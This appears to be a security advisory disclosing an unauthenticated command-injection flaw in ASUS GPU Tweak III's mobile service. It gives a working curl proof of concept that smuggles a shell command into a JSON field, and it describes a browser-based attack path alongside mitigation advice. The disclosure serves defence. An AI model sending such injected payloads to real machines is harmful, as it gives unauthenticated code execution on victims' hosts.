ASUS GPU Tweak III Remote Code Execution

General Overview

ASUS GPU Tweak III is a GPU overclocking and monitoring application for graphics cards. It works with any brand of card โ€“ not just ASUS and ROG โ€“ and is used to overclock, undervolt, tweak fan speeds, and monitor GPU metrics. ASUS GPU Tweak III v2.1.8.0 for Windows, and likely prior versions, contains a vulnerability chain that enables Remote Code Execution through command injection on Windows hosts running the software with the Mobile Module service component installed. The attack requires no authentication and can be triggered from the local network or potentially from a malicious website. Successful exploitation allows an attacker to execute arbitrary commands with the privileges of the user account under which the mobile plugin service runs (typically administrator).

Affected Component

File: GT3 mobile service.exe (Mobile Module service component; HTTP API logic in the bundled index.js)
Endpoint: POST /arrange_page_setting
Process spawning: index.js builds a reg.exe command line with attacker-controlled, unquoted JSON fields (bIsSupport, iPosIndex) and executes it through cmd.exe
Listening: tcp://0.0.0.0:5001 (all interfaces, no authentication, Access-Control-Allow-Origin: *)

Vulnerability Details

When the service receives {"situation":"change_show","item":[{โ€ฆ}]} on /arrange_page_setting, the handler (write_monitor_setting) constructs and runs:

reg add hklm\SOFTWARE\WOW6432Node\ASUS\GPUTweakIII\Mobile\Monitor /v <name> /t REG_MULTI_SZ /s, /d <bIsSupport>,<bIsShow>,<iPosIndex> /f

The fields bIsSupport and iPosIndex are inserted directly into the command string, with no quoting and no validation. Because the string is parsed by cmd.exe, shell metacharacters (&, |, >, %ENV%) are interpreted and executed. The root cause is that index.js runs the user input through a shell-interpreted command line (child_process exec / execFile with shell:true semantics) instead of passing arguments as an array.

Attack Vectors

Direct Network (Primary)

Since the mobile service daemon listens on 0.0.0.0:5001, any machine on the network can call the API directly:

# Inject a command that writes a marker file with the output of "whoami"
curl -s "http://<victim>:5001/arrange_page_setting" \
     -H "Content-Type: application/json" \
     -d '{"situation":"change_show","item":[{"uDataID":"x","bIsSupport":"1 /f & whoami > C:\\pwn_lan.txt & rem x","bIsShow":1,"iPosIndex":0}]}'

The injected whoami command runs and writes its output to a marker file at C:\pwn_lan.txt, which proves arbitrary command execution.

Mitigation

Until ASUS ships a fix, the only dependable mitigation is to stop and disable the Mobile Module service (GT3 mobile service.exe), or to uninstall the Mobile Module component altogether, which removes the listener on TCP port 5001 entirely while leaving the core overclocking and monitoring features usable on the local machine. A Windows Defender Firewall rule that blocks inbound connections to the service only prevents other hosts on the network from reaching it; because the endpoint returns Access-Control-Allow-Origin: *, a malicious website can still make the victim's own browser issue cross-origin requests to the service over the loopback interface (127.0.0.1:5001), which host firewalls do not filter.

Disclosure timeline:

2026-08-30 โ€“ Contacting ASUS regarding the security vulnerability

No reply has been received from the vendor since.

Similar Issues

About Us

ยฉ 2025 Critical Security